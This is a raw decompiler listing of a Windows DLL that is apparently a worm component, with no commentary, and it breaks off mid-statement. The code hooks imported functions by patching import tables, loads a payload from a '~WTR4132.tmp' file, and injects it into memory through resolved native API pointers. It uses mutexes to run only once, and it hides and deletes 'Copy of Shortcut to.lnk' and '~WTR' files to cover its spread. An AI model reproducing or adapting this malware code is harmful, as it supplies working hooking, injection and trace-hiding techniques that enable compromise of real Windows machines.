(10001B20) -------------------------------------------------------- signed int __userpurge sub_10001B20(int a1, DWORD lpString1, LPCSTR lpString2, int a4) { DWORD v4; // ebx@1 void *v5; // esp@1 HANDLE v6; // eax@1 signed int result; // eax@2 char v8; // [sp-Ch] [bp-1234h]@1 HMODULE lp; // [sp+0h] [bp-1228h]@1 WCHAR Filename; // [sp+1000h] [bp-228h]@5 DWORD v11; // [sp+1208h] [bp-20h]@4 DWORD cbNeeded; // [sp+120Ch] [bp-1Ch]@1 char *v13; // [sp+1210h] [bp-18h]@1 int v14; // [sp+1218h] [bp-10h]@1 signed int (__usercall *v15)(int); // [sp+121Ch] [bp-Ch]@1 _UNKNOWN *v16; // [sp+1220h] [bp-8h]@1 int v17; // [sp+1224h] [bp-4h]@1 v17 = -1; v16 = &unk_100055E8; v15 = sub_100028A8; v14 = a1; v5 = alloca(4624); v13 = &v8; v4 = 0; cbNeeded = 0; v6 = GetCurrentProcess(); if ( EnumProcessModules(v6, &lp, 0x1000u, &cbNeeded) >= 0 ) { cbNeeded >>= 2; while ( 1 ) { v11 = v4; if ( v4 >= cbNeeded ) break; v17 = 0; if ( !GetModuleFileNameW(*(&lp + v4), &Filename, 0x104u) || IsBadReadPtr(*(&lp + v4), 0x40u) || sub_10001F80(&Filename) ) { v17 = -1; ++v4; } else { sub_10001C40(lpString1, (int)*(&lp + v4), (LPCSTR)lpString1, lpString2, a4); v17 = -1; ++v4; } } result = 1; } else { result = 0; } return result; } //----- (10001C40) -------------------------------------------------------- signed int __userpurge sub_10001C40(DWORD a1, int a2, LPCSTR lpString1, LPCSTR lpString2, int a5) { int v6; // ebp@3 int v7; // edx@5 int v8; // ebp@5 const CHAR *v9; // edx@6 int v10; // ecx@6 int v11; // ebx@6 void *v12; // esi@6 char v13; // sf@9 int v14; // eax@9 DWORD flOldProtect; // [sp+0h] [bp-4h]@1 flOldProtect = a1; if ( *(_WORD *)a2 != 23117 ) return 0; v6 = *(_DWORD *)(*(_DWORD *)(a2 + 60) + a2 + 128); if ( !v6 ) return 0; v7 = *(_DWORD *)(v6 + 12 + a2); v8 = a2 + v6; if ( !v7 ) return 1; while ( 1 ) { v10 = *(_DWORD *)(v8 + 16); v9 = (const CHAR *)(a2 + v7); v12 = (void *)(v10 + a2); v11 = *(_DWORD *)v8 + a2; if ( *(_DWORD *)v8 ) { if ( v10 ) { if ( !lstrcmpiA(lpString1, v9) ) { v14 = *(_DWORD *)v11; v13 = *(_DWORD *)v11 < 0; if ( *(_DWORD *)v11 ) break; } } } LABEL_15: v7 = *(_DWORD *)(v8 + 32); v8 += 20; if ( !v7 ) return 1; } while ( 1 ) { if ( v13 || lstrcmpA((LPCSTR)(v14 + a2 + 2), lpString2) ) goto LABEL_14; if ( !VirtualProtect(v12, 4u, 0x80u, &flOldProtect) ) return 0; *(_DWORD *)v12 = a5; LABEL_14: v14 = *(_DWORD *)(v11 + 4); v11 += 4; v12 = (char *)v12 + 4; v13 = v14 < 0; if ( !v14 ) goto LABEL_15; } } //----- (10001D00) -------------------------------------------------------- WCHAR *__usercall sub_10001D00(const WCHAR *a1) { WCHAR *result; // eax@1 int v2; // ebx@1 DWORD v3; // ecx@2 void *v4; // esi@3 LPVOID lpAddress; // [sp+Ch] [bp-214h]@2 int v6; // [sp+10h] [bp-210h]@2 int v7; // [sp+14h] [bp-20Ch]@3 WCHAR String[260]; // [sp+18h] [bp-208h]@1 lstrcpynW(String, a1, 260); v2 = lstrlenW(L"~WTR4132.tmp"); result = &String[lstrlenW(String) - v2]; if ( result ) { lstrcpynW(result, L"~WTR4132.tmp", 260); result = (WCHAR *)sub_10001D90(String, v3, &lpAddress, (DWORD *)&v6); if ( result ) { v4 = lpAddress; sub_100034D2(0, lpAddress, v6, (int)&v7); result = (WCHAR *)VirtualFree(v4, 0, 0x8000u); } } return result; } // 10001D00: using guessed type WCHAR String[260]; //----- (10001D90) -------------------------------------------------------- signed int __usercall sub_10001D90(const WCHAR *a1, DWORD a2, LPVOID *a3, DWORD *a4) { HANDLE v4; // eax@1 void *v5; // esi@1 void *v6; // eax@2 DWORD v7; // eax@2 DWORD NumberOfBytesRead; // [sp+0h] [bp-4h]@1 NumberOfBytesRead = a2; v4 = CreateFileW(a1, 0x80000000u, 1u, 0, 3u, 0, 0); v5 = v4; if ( v4 != (HANDLE)-1 ) { v7 = GetFileSize(v4, 0); *a4 = v7; v6 = VirtualAlloc(0, v7, 0x3000u, 4u); *a3 = v6; if ( !v6 ) { CloseHandle(v5); return 0; } if ( ReadFile(v5, v6, *a4, &NumberOfBytesRead, 0) && NumberOfBytesRead == *a4 ) { CloseHandle(v5); return 1; } VirtualFree(*a3, 0, 0x8000u); } return 0; } //----- (10001E20) -------------------------------------------------------- BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { int v3; // eax@1 BOOL result; // eax@3 char v5; // [sp-Ch] [bp-24h]@1 char *v6; // [sp+0h] [bp-18h]@1 int v7; // [sp+8h] [bp-10h]@1 signed int (__usercall *v8)(int); // [sp+Ch] [bp-Ch]@1 _UNKNOWN *v9; // [sp+10h] [bp-8h]@1 int v10; // [sp+14h] [bp-4h]@1 v9 = &unk_100055D8; v8 = sub_100028A8; v7 = v3; v6 = &v5; v10 = 0; if ( fdwReason && fdwReason == 1 ) { hModule = hinstDLL; DisableThreadLibraryCalls(hinstDLL); result = sub_10001ED0(); v10 = -1; } else { result = 1; } return result; } //----- (10001EA7) -------------------------------------------------------- signed int __cdecl sub_10001EA7() { return 1; } //----- (10001EAD) -------------------------------------------------------- int __userpurge sub_10001EAD(int a1, int a2, int a3, int a4) { *(_DWORD *)(a1 - 4) = -1; return 0; } // 10001EAD: could not find valid save-restore pair for ebx // 10001EAD: could not find valid save-restore pair for edi // 10001EAD: could not find valid save-restore pair for esi //----- (10001ED0) -------------------------------------------------------- DWORD __cdecl sub_10001ED0() { DWORD result; // eax@1 HANDLE v1; // esi@5 bool v2; // edi@6 FARPROC v3; // eax@7 HMODULE hLibModule; // [sp+0h] [bp-20Ch]@6 WCHAR FileName; // [sp+4h] [bp-208h]@1 result = GetModuleFileNameW(hModule, &FileName, 0x104u); if ( result ) { if ( sub_10001F80(&FileName) ) return 1; v1 = sub_100020A0(); if ( v1 ) { v2 = sub_10001FD0(&FileName, (int)&hLibModule); ReleaseMutex(v1); CloseHandle(v1); if ( v2 ) { v3 = GetProcAddress(hLibModule, (LPCSTR)1); if ( !v3 ) { FreeLibrary(hLibModule); return 0; } ((void (__cdecl *)(_DWORD, _DWORD))v3)(&FileName, 0); } } result = 0; } return result; } //----- (10001F80) -------------------------------------------------------- signed int __usercall sub_10001F80(const WCHAR *a1) { int i; // eax@1 int v2; // edi@1 int v3; // eax@4 signed __int16 v4; // cx@4 v2 = (int)L"SHELL32.DLL.ASLR."; for ( i = (int)&a1[lstrlenW(a1) - 1]; i >= (unsigned int)a1; i -= 2 ) { if ( *(_WORD *)i == 92 ) break; } v3 = i + 2; v4 = 83; while ( v4 == *(_WORD *)v3 ) { v4 = *(_WORD *)(v2 + 2); v2 += 2; v3 += 2; if ( !v4 ) return 1; } return 0; } // 100054C4: using guessed type wchar_t aShell32_dll_as[18]; //----- (10001FD0) -------------------------------------------------------- bool __stdcall sub_10001FD0(LPCWSTR lpFileName, int a2) { UINT v2; // edi@1 int v3; // ebx@1 bool result; // eax@2 DWORD v5; // edi@3 DWORD v6; // eax@3 int v7; // esi@3 const void *hObject; // [sp+Ch] [bp-210h]@1 int v9; // [sp+10h] [bp-20Ch]@1 WCHAR String2; // [sp+14h] [bp-208h]@3 v2 = SetErrorMode(32775u); v3 = sub_100035ED(lpFileName, &hObject, (int)&v9); SetErrorMode(v2); if ( v3 ) { v5 = GetTickCount() / 7; v6 = GetTickCount(); wsprintfW(&String2, L"%s%08x", L"SHELL32.DLL.ASLR.", v5 + 7 * v6); v7 = sub_100034D2(&String2, hObject, v9, a2); sub_1000368F((LPVOID)hObject); result = v7 == 0; } else { result = 0; } return result; } // 100054C4: using guessed type wchar_t aShell32_dll_as[18]; //----- (100020A0) -------------------------------------------------------- HANDLE __cdecl sub_100020A0() { HANDLE v0; // esi@1 DWORD v1; // eax@1 WCHAR Name; // [sp+4h] [bp-84h]@1 v1 = GetCurrentProcessId(); wsprintfW(&Name, L"{%08x-%08x-%08x-%08x}", v1 ^ 0x5858AA3, v1 ^ 0xAE48481, v1 ^ 0x5858721, v1 ^ 0x49481); v0 = CreateMutexW(0, 1, &Name); if ( !v0 ) return 0; if ( GetLastError() == 183 && WaitForSingleObject(v0, 0x1388u) ) { CloseHandle(v0); return 0; } return v0; } //----- (10002130) -------------------------------------------------------- HANDLE __cdecl sub_10002130() { HANDLE v0; // esi@1 DWORD v1; // eax@1 WCHAR Name; // [sp+4h] [bp-84h]@1 v1 = GetCurrentProcessId(); wsprintfW(&Name, L"{%08x-%08x-%08x-%08x}", v1 ^ 0x9487481, v1 ^ 0x40941, v1 ^ 0x5800097, v1 ^ 0x4393481); v0 = CreateMutexW(0, 1, &Name); if ( !v0 ) return 0; if ( GetLastError() == 183 && WaitForSingleObject(v0, 0x1388u) ) { CloseHandle(v0); return 0; } return v0; } //----- (100021C0) -------------------------------------------------------- HRESULT __stdcall DllGetClassObject(const IID *const rclsid, const IID *const riid, LPVOID *ppv) { WCHAR *v3; // eax@1 const WCHAR *v4; // esi@1 int v5; // eax@1 SIZE_T v6; // ST14_4@1 HANDLE v7; // eax@1 int v8; // eax@2 HRESULT result; // eax@3 HANDLE v10; // eax@4 char v11; // [sp-Ch] [bp-24h]@1 char *v12; // [sp+0h] [bp-18h]@1 int v13; // [sp+8h] [bp-10h]@1 signed int (__usercall *v14)(int); // [sp+Ch] [bp-Ch]@1 _UNKNOWN *v15; // [sp+10h] [bp-8h]@1 int v16; // [sp+14h] [bp-4h]@1 v15 = &unk_10005618; v14 = sub_100028A8; v13 = v5; v12 = &v11; v16 = 0; v6 = 2 * lstrlenW((LPCWSTR)rclsid) + 2; v7 = GetProcessHeap(); v3 = (WCHAR *)HeapAlloc(v7, 8u, v6); v4 = v3; if ( !v3 ) goto LABEL_9; v8 = (int)lstrcpyW(v3, (LPCWSTR)rclsid); if ( riid ) { sub_10002340(v4, v8); v16 = -1; return 1; } v10 = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)StartAddress, (LPVOID)v4, 0, 0); if ( v10 ) { CloseHandle(v10); v16 = -1; result = 1; } else { LABEL_9: result = 0; } return result; } // 100021C0: inconsistent function type and number of purged bytes //----- (100022B0) -------------------------------------------------------- int __userpurge StartAddress(int a1, LPCWSTR lpFileName) { HANDLE v2; // esi@1 int v4; // eax@3 char v5; // [sp-Ch] [bp-24h]@1 char *v6; // [sp+0h] [bp-18h]@1 int v7; // [sp+8h] [bp-10h]@1 signed int (__usercall *v8)(int); // [sp+Ch] [bp-Ch]@1 _UNKNOWN *v9; // [sp+10h] [bp-8h]@1 int v10; // [sp+14h] [bp-4h]@1 v9 = &unk_10005608; v8 = sub_100028A8; v7 = a1; v6 = &v5; v10 = 0; v2 = sub_10002130(); if ( v2 ) { sub_10001430(); ReleaseMutex(v2); CloseHandle(v2); } Sleep(0x2710u); sub_10002340(lpFileName, v4); return 0; } //----- (10002340) -------------------------------------------------------- void __usercall sub_10002340(LPCWSTR lpFileName, int a2) { const WCHAR *v2; // edi@1 HANDLE v3; // esi@1 char v4; // [sp-Ch] [bp-24h]@1 char *v5; // [sp+0h] [bp-18h]@1 int v6; // [sp+8h] [bp-10h]@1 signed int (__usercall *v7)(int); // [sp+Ch] [bp-Ch]@1 _UNKNOWN *v8; // [sp+10h] [bp-8h]@1 int v9; // [sp+14h] [bp-4h]@1 v8 = &unk_100055F8; v7 = sub_100028A8; v6 = a2; v5 = &v4; v2 = lpFileName; v9 = 0; v3 = CreateMutexW(0, 1, L"{BE3533AB-2DDC-46a1-8F7B-F102B8A5C30A}"); if ( v3 ) { if ( GetLastError() == 183 ) { CloseHandle(v3); } else { sub_10001D00(v2); sub_100023D0(v2); } } } //----- (100023D0) -------------------------------------------------------- void __stdcall sub_100023D0(LPCWSTR lpFileName) { const WCHAR *v1; // edi@1 bool v2; // ebp@2 HANDLE v3; // esi@2 HANDLE hObject; // [sp+8h] [bp-2Ch]@1 int v5; // [sp+Ch] [bp-28h]@1 char FileInformation; // [sp+10h] [bp-24h]@1 char v7; // [sp+14h] [bp-20h]@3 char v8; // [sp+1Ch] [bp-18h]@3 char v9; // [sp+24h] [bp-10h]@3 v1 = lpFileName; hObject = (HANDLE)-1; v5 = GetFileAttributesExW(lpFileName, 0, &FileInformation); if ( !sub_10002460((int)&hObject, lpFileName) ) goto LABEL_8; v3 = hObject; v2 = sub_100024F0(hObject) == 0; if ( v5 ) { sub_10001000((int)&v7, (int)&v8, (int)&v9, v3); v1 = lpFileName; v3 = hObject; } CloseHandle(v3); SetFileAttributesW(v1, 2u); if ( v2 ) LABEL_8: sub_100025B0(v1); } //----- (10002460) -------------------------------------------------------- bool __userpurge sub_10002460(int a1, LPCWSTR lpFileName) { signed int v2; // esi@1 HANDLE v3; // eax@2 v2 = 0; do { v3 = CreateFileW(lpFileName, 0xC0000000u, 3u, 0, 3u, 0, 0); *(_DWORD *)a1 = v3; if ( v3 != (HANDLE)-1 ) break; Sleep(0xBB8u); ++v2; } while ( v2 < 8 ); return v2 != 8; } //----- (100024B0) -------------------------------------------------------- bool __userpurge sub_100024B0(DWORD a1, DWORD a2, void *a3, const void *a4) { DWORD NumberOfBytesWritten; // [sp+0h] [bp-4h]@1 NumberOfBytesWritten = a1; return !SetFilePointer(a3, 0, 0, 0) && WriteFile(a3, a4, a2, &NumberOfBytesWritten, 0) && a2 == NumberOfBytesWritten; } //----- (100024F0) -------------------------------------------------------- bool __thiscall sub_100024F0(void *this) { void *v1; // esi@1 DWORD v2; // edi@3 DWORD v3; // ecx@7 unsigned int v4; // eax@8 int v5; // edx@8 bool result; // eax@11 DWORD NumberOfBytesRead; // [sp+8h] [bp-1004h]@2 int Buffer; // [sp+Ch] [bp-1000h]@2 int v9; // [sp+48h] [bp-FC4h]@6 v1 = this; if ( !SetFilePointer(this, 0, 0, 0) && ReadFile(v1, &Buffer, 0x1000u, &NumberOfBytesRead, 0) && (v2 = NumberOfBytesRead, NumberOfBytesRead) && NumberOfBytesRead >= 0x40 && (_WORD)Buffer == 23117 && NumberOfBytesRead >= v9 + 248 && (v3 = (DWORD)((char *)&Buffer + v9), *(int *)((char *)&Buffer + v9) == 17744) && (v5 = *(_DWORD *)(v3 + 8), v4 = (unsigned __int8)*(_DWORD *)(v3 + 8), dword_10006020 = v4, v4 != 1) && v4 && v4 <= 0x7F ) { *(_DWORD *)(v3 + 8) = v5 - 1; result = sub_100024B0(v3, v2, v1, &Buffer) != 0; } else { result = 0; } return result; } // 10006020: using guessed type int dword_10006020; //----- (100025B0) -------------------------------------------------------- void __usercall sub_100025B0(const WCHAR *a1) { int i; // eax@1 const WCHAR *v2; // esi@1 WCHAR *v3; // edi@4 int v4; // esi@4 signed int v5; // esi@8 unsigned __int8 v6; // sf@12 unsigned __int8 v7; // of@12 signed int v8; // esi@13 signed int v9; // esi@17 int j; // [sp+10h] [bp-20Ch]@4 WCHAR FileName[260]; // [sp+14h] [bp-208h]@1 v2 = a1; lstrcpyW(FileName, a1); for ( i = lstrlenW(v2) - 1; i >= 0; --i ) { if ( FileName[i] == 92 ) break; } v3 = &FileName[i + 1]; v4 = 0; *v3 = 0; for ( j = 0; ; v4 = j ) { lstrcpyW(v3, &word_10005428); if ( v4 > 0 ) { do { lstrcatW(v3, L"Copy of "); --v4; } while ( v4 ); } lstrcatW(v3, L"Copy of Shortcut to.lnk"); v5 = 0; do { SetFileAttributesW(FileName, 0x80u); if ( DeleteFileW(FileName) ) break; if ( GetFileAttributesW(FileName) == -1 ) break; Sleep(0x1F4u); ++v5; } while ( v5 < 8 ); v7 = __SETO__(j + 1, 4); v6 = j++ - 3 < 0; if ( !(v6 ^ v7) ) break; } lstrcpyW(v3, L"~WTR4132.tmp"); v8 = 0; do { SetFileAttributesW(FileName, 128u); if ( DeleteFileW(FileName) ) break; if ( GetFileAttributesW(FileName) == -1 ) break; Sleep(0x1F4u); ++v8; } while ( v8 < 8 ); lstrcpyW(v3, L"~WTR4141.tmp"); v9 = 0; do { SetFileAttributesW(FileName, 0x80u); if ( DeleteFileW(FileName) ) break; if ( GetFileAttributesW(FileName) == -1 ) break; Sleep(0x1F4u); ++v9; } while ( v9 < 8 ); } // 100025B0: using guessed type WCHAR FileName[260]; //----- (100027B0) -------------------------------------------------------- int __cdecl sub_100027B0(int a1) { return RtlUnwind(a1, loc_100027C8, 0, 0); } // 100027C8: using guessed type int __cdecl loc_100027C8(int); // 10003C7E: using guessed type int __stdcall RtlUnwind(_DWORD, _DWORD, _DWORD, _DWORD); //----- (100027D0) -------------------------------------------------------- signed int __cdecl sub_100027D0(int a1, int a2, int a3, int a4) { signed int result; // eax@1 result = 1; if ( *(_DWORD *)(a1 + 4) & 6 ) { *(_DWORD *)a4 = a2; result = 3; } return result; } //----- (100027F2) -------------------------------------------------------- int __usercall sub_100027F2(int a1, int a2, int a3) { int result; // eax@1 int v4; // ebx@1 int v5; // esi@1 int v6; // esi@3 while ( 1 ) { result = a2; v4 = *(_DWORD *)(a2 + 8); v5 = *(_DWORD *)(a2 + 12); if ( v5 == -1 ) break; if ( v5 == a3 ) break; v6 = 3 * v5; *(_DWORD *)(a2 + 12) = *(_DWORD *)(v4 + 4 * v6); if ( !*(_DWORD *)(v4 + 4 * v6 + 4) ) { sub_10002886(*(_DWORD *)(v4 + 4 * v6 + 8), a1, 257); (*(void (**)(void))(v4 + 4 * v6 + 8))(); } } return result; } //----- (10002886) -------------------------------------------------------- int __userpurge sub_10002886(int result, int a2, int a3) { dword_10006000[2] = *(_DWORD *)(a2 + 8); dword_10006000[1] = result; dword_10006000[3] = a2; return result; } //----- (100028A8) -------------------------------------------------------- signed int __usercall sub_100028A8(int a1) { int v1; // eax@1 int v2; // ebx@1 int v3; // edi@2 int v4; // esi@2 int v5; // eax@5 int v6; // edi@7 int v7; // ecx@7 signed int result; // eax@9 int v9; // [sp-8h] [bp-20h]@5 v2 = *(_DWORD *)(a1 + 12); v1 = *(_DWORD *)(a1 + 8); if ( *(_DWORD *)(v1 + 4) & 6 ) { sub_100027F2(v2 + 16, v2, -1); result = 1; } else { *(_DWORD *)(a1 - 8) = v1; *(_DWORD *)(a1 - 4) = *(_DWORD *)(a1 + 16); *(_DWORD *)(v2 - 4) = a1 - 8; v4 = *(_DWORD *)(v2 + 12); v3 = *(_DWORD *)(v2 + 8); while ( v4 != -1 ) { if ( *(_DWORD *)(v3 + 12 * v4 + 4) ) { v9 = a1; v5 = (*(int (__thiscall **)(int))(v3 + 12 * v4 + 4))(3 * v4); a1 = v9; v2 = *(_DWORD *)(v9 + 12); if ( v5 ) { if ( v5 < 0 ) return 0; v6 = *(_DWORD *)(v2 + 8); sub_100027B0(*(_DWORD *)(v9 + 12)); a1 = v2 + 16; sub_100027F2(v2 + 16, v2, v4); sub_10002886(*(_DWORD *)(v6 + 12 * v4 + 8), v2 + 16, 1); *(_DWORD *)(v2 + 12) = *(_DWORD *)(v6 + 4 * v7); (*(void (**)(void))(v6 + 4 * v7 + 8))(); } } v3 = *(_DWORD *)(v2 + 8); v4 = *(_DWORD *)(v3 + 12 * v4); } result = 1; } return result; } //----- (10002D70) -------------------------------------------------------- void *__cdecl sub_10002D70(void *a1, unsigned __int8 a2, unsigned int a3) { int v3; // edx@1 int v4; // eax@2 void *v5; // edi@2 int v6; // ecx@3 unsigned int v7; // ecx@6 unsigned int v8; // ecx@6 void *result; // eax@9 v3 = a3; if ( a3 ) { LOBYTE(v4) = a2; v5 = a1; if ( a3 < 4 ) goto LABEL_13; v6 = -(signed int)a1 & 3; if ( v6 ) { v3 = a3 - v6; do { *(_BYTE *)v5 = a2; v5 = (char *)v5 + 1; --v6; } while ( v6 ); } v4 = 16843009 * a2; v8 = v3; v3 &= 3u; v7 = v8 >> 2; if ( !v7 || (memset(v5, v4, 4 * v7), v5 = (char *)v5 + 4 * v7, v3) ) { LABEL_13: do { *(_BYTE *)v5 = v4; v5 = (char *)v5 + 1; --v3; } while ( v3 ); } result = a1; } else { result = a1; } return result; } //----- (10002DD4) -------------------------------------------------------- signed int __thiscall sub_10002DD4(DWORD this) { signed int result; // eax@3 DWORD flOldProtect; // [sp+0h] [bp-4h]@1 flOldProtect = this; if ( VirtualProtect(&dword_10003C3A, 0x44u, 0x80u, &flOldProtect) || VirtualProtect(&dword_10003C3A, 0x44u, 0x40u, &flOldProtect) ) { dword_10003C3A = (int)sub_10003708(); dword_10003C42 = (int)sub_10003788((int)&unk_10005110); dword_10003C46 = (int)sub_10003788((int)&unk_10005124); dword_10003C4A = (int)sub_10003788((int)&unk_10005140); dword_10003C4E = (int)sub_10003788((int)&unk_10005160); dword_10003C52 = (int)sub_10003788((int)&unk_10005180); dword_10003C56 = (int (__stdcall *)(_DWORD))sub_10003788((int)&unk_1000519C); dword_10003C5A = (int)sub_10003788((int)&unk_100051BC); dword_10003C5E = (int)sub_10003788((int)&unk_100051E8); dword_10003C62 = (int)sub_10003788((int)&unk_10005204); dword_10003C66 = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))sub_10003799((int)&unk_1000521C); dword_10003C6A = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))sub_10003799((int)&unk_1000523C); dword_10003C6E = (int)sub_10003788((int)&unk_10005264); dword_10003C72 = (int)sub_10003788((int)&unk_10005280); dword_10003C76 = (int)sub_10003788((int)&unk_100052A8); dword_10003C7A = (int (__stdcall *)(_DWORD))sub_10003799((int)&unk_100052CC); result = 1; } else { result = 0; } return result; } // 10003C3A: using guessed type int dword_10003C3A; // 10003C42: using guessed type int dword_10003C42; // 10003C46: using guessed type int dword_10003C46; // 10003C4A: using guessed type int dword_10003C4A; // 10003C4E: using guessed type int dword_10003C4E; // 10003C52: using guessed type int dword_10003C52; // 10003C56: using guessed type int (__stdcall *dword_10003C56)(_DWORD); // 10003C5A: using guessed type int dword_10003C5A; // 10003C5E: using guessed type int dword_10003C5E; // 10003C62: using guessed type int dword_10003C62; // 10003C66: using guessed type int (__stdcall *dword_10003C66)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // 10003C6A: using guessed type int (__stdcall *dword_10003C6A)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // 10003C6E: using guessed type int dword_10003C6E; // 10003C72: using guessed type int dword_10003C72; // 10003C76: using guessed type int dword_10003C76; // 10003C7A: using guessed type int (__stdcall *dword_10003C7A)(_DWORD); //----- (10002F0F) -------------------------------------------------------- signed int __cdecl sub_10002F0F(int a1, int a2, int a3, int a4, int a5) { signed int result; // eax@2 HANDLE v6; // eax@3 int v7; // [sp+0h] [bp-10h]@1 int v8; // [sp+4h] [bp-Ch]@3 int v9; // [sp+8h] [bp-8h]@1 int v10; // [sp+Ch] [bp-4h]@1 v7 = a2; v9 = a2; v10 = 0; if ( dword_10003C66(a3, 983071, 0, &v9, 64, 134217728, 0) ) { result = -5; } else { v6 = GetCurrentProcess(); v8 = dword_10003C6A(*(_DWORD *)a3, v6, a4, 0, 0, 0, &v7, 1, 0, 64); if ( v8 ) { result = -5; } else { v8 = dword_10003C6A(*(_DWORD *)a3, a1, a5, 0, 0, 0, &v7, 1, 0, 64); if ( v8 ) result = -5; else result = 0; } } return result; } // 10003C66: using guessed type int (__stdcall *dword_10003C66)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // 10003C6A: using guessed type int (__stdcall *dword_10003C6A)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); //----- (10002FBF) -------------------------------------------------------- int __cdecl sub_10002FBF(void **a1, int a2, int a3, int a4, const void *a5, unsigned int a6) { int result; // eax@3 if ( a6 ) sub_10003774(*a1, a5, a6); *(_DWORD *)a4 = *(_DWORD *)a3 + a2; *(_DWORD *)(a4 + 4) = a6; *a1 = (char *)*a1 + a6; result = a6 + *(_DWORD *)a3; *(_DWORD *)a3 = result; return result; } //----- (1000300D) -------------------------------------------------------- signed int __cdecl sub_1000300D(int a1, LPCWSTR lpString2) { DWORD v3; // esi@5 const WCHAR v4; // [sp+8h] [bp-58h]@5 DWORD v5; // [sp+5Ch] [bp-4h]@5 if ( lpString2 ) { if ( lstrlenW(lpString2) >= 31 ) return -1; lstrcpyW((LPWSTR)(a1 + 16), lpString2); } else { v3 = GetTickCount(); v5 = 3 * GetCurrentThreadId() + v3; sub_100036CB((int)&unk_100050E0, (int)&v4); do wsprintfW((LPWSTR)(a1 + 16), &v4, v5++); while ( GetModuleHandleW((LPCWSTR)(a1 + 16)) ); } *(_DWORD *)a1 = a1 ^ 0xAE1979DD; *(_DWORD *)(a1 + 4) = 0; *(_DWORD *)(a1 + 12) = sub_10003F58; return 0; } //----- (100030C2) -------------------------------------------------------- int __cdecl sub_100030C2(int a1, const void *a2, const void *a3, unsigned int a4, int a5, const void *a6, unsigned int a7, int a8) { int result; // eax@2 int v9; // [sp+4h] [bp-28h]@1 int v10; // [sp+8h] [bp-24h]@3 int v11; // [sp+Ch] [bp-20h]@6 int v12; // [sp+10h] [bp-1Ch]@1 int v13; // [sp+14h] [bp-18h]@1 int v14; // [sp+18h] [bp-14h]@3 unsigned int v15; // [sp+1Ch] [bp-10h]@1 int v16; // [sp+20h] [bp-Ch]@1 int v17; // [sp+24h] [bp-8h]@3 int v18; // [sp+28h] [bp-4h]@1 v13 = 0; v16 = 0; v12 = 0; v15 = a4 + a7 + 152; v18 = sub_10002F0F(a1, a4 + a7 + 152, (int)&v9, (int)&v13, (int)&v16); if ( v18 ) { result = v18; } else { v17 = v13; v13 += 152; v12 = 152; sub_10002FBF((void **)&v13, v16, (int)&v12, v17 + 132, a6, a7); v10 = v13; sub_10002FBF((void **)&v13, v16, (int)&v12, v17 + 140, a3, a4); v14 = v10; if ( a4 >= 0x1000 ) { if ( *(_WORD *)v14 == 23117 ) { if ( *(_DWORD *)(v14 + 60) + 248 < a4 ) { v11 = *(_DWORD *)(v14 + 60) + v10; if ( *(_DWORD *)(v11 + 204) == 72 ) *(_DWORD *)(v11 + 204) = 64; } } } sub_10003774((void *)v17, a2, 0x80u); *(_DWORD *)(v17 + 148) = a5; *(_DWORD *)(v17 + 128) = 0; *(_DWORD *)a8 = v16; dword_10003C56(v17); dword_10003C7A(v9); result = 0; } return result; } // 10003C56: invalid function type has been ignored // 10003C7A: invalid function type has been ignored // 10003C56: using guessed type int (__stdcall *dword_10003C56)(_DWORD); // 10003C7A: using guessed type int (__stdcall *dword_10003C7A)(_DWORD); //----- (1000320E) -------------------------------------------------------- signed int __cdecl sub_1000320E(int a1, int a2, const void *a3) { signed int result; // eax@2 int v4; // [sp+0h] [bp-90h]@5 int v5; // [sp+4h] [bp-8Ch]@7 signed int v6; // [sp+8h] [bp-88h]@1 int v7; // [sp+Ch] [bp-84h]@1 unsigned int v8; // [sp+10h] [bp-80h]@1 int v9; // [sp+14h] [bp-7Ch]@1 int v10; // [sp+18h] [bp-78h]@7 char v11; // [sp+20h] [bp-70h]@5 sub_10003774(&v8, a3, 0x80u); v8 = (unsigned int)&v8 ^ 0xAE1979DD; v9 = 0; v7 = (char *)&dword_10003C3A + *(_DWORD *)(a1 + 8) - byte_100037D9; v6 = sub_100041EB( (char *)&dword_10003C3A + *(_DWORD *)(a1 + 8) - byte_100037D9, (int)&v8, *(const void **)(a2 + 140), *(_DWORD *)(a2 + 144)); if ( v6 ) { result = v6; } else { if ( sub_1000414D(a1, v7) ) { result = -4; } else { v4 = (*(int (__stdcall **)(char *))(v7 + 36))(&v11); if ( v4 ) { *(_DWORD *)(a2 + 128) = v4; v5 = v10; if ( v10 ) { v10 = 0; (*(void (__stdcall **)(int))(v7 + 64))(v5); } result = 0; } else { result = -9; } } } return result; } // 10003C3A: using guessed type int dword_10003C3A; //----- (10003327) -------------------------------------------------------- unsigned int __cdecl sub_10003327() { return (char *)sub_100042CC - (char *)(void (__cdecl *)())sub_10003C84; } //----- (10003336) -------------------------------------------------------- signed int (__cdecl *__cdecl sub_10003336())(int) { return sub_10003C84; } //----- (10003340) -------------------------------------------------------- unsigned int __cdecl sub_10003340() { return (char *)sub_10003E22 - (char *)(int (__stdcall *)(int))sub_10003C84; } //----- (1000334F) -------------------------------------------------------- unsigned int __cdecl sub_1000334F() { return (char *)sub_10003F58 - (char *)(signed int (__stdcall *)(int))sub_10003C84; } //----- (1000335E) -------------------------------------------------------- int __cdecl sub_1000335E(int a1, int a2, int a3, int a4) { int result; // eax@2 unsigned int v5; // ST14_4@3 signed int (__cdecl *v6)(int); // eax@3 int v7; // [sp+8h] [bp-28h]@1 int v8; // [sp+Ch] [bp-24h]@3 unsigned int v9; // [sp+10h] [bp-20h]@3 int v10; // [sp+14h] [bp-1Ch]@1 int v11; // [sp+18h] [bp-18h]@1 unsigned int v12; // [sp+1Ch] [bp-14h]@1 int v13; // [sp+20h] [bp-10h]@1 int v14; // [sp+24h] [bp-Ch]@3 unsigned int v15; // [sp+28h] [bp-8h]@1 int v16; // [sp+2Ch] [bp-4h]@1 v11 = 0; v13 = 0; v15 = sub_10003327(); v12 = v15 + (char *)RtlUnwind - (char *)(int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD))byte_100037D9 + byte_100037D9 - (char 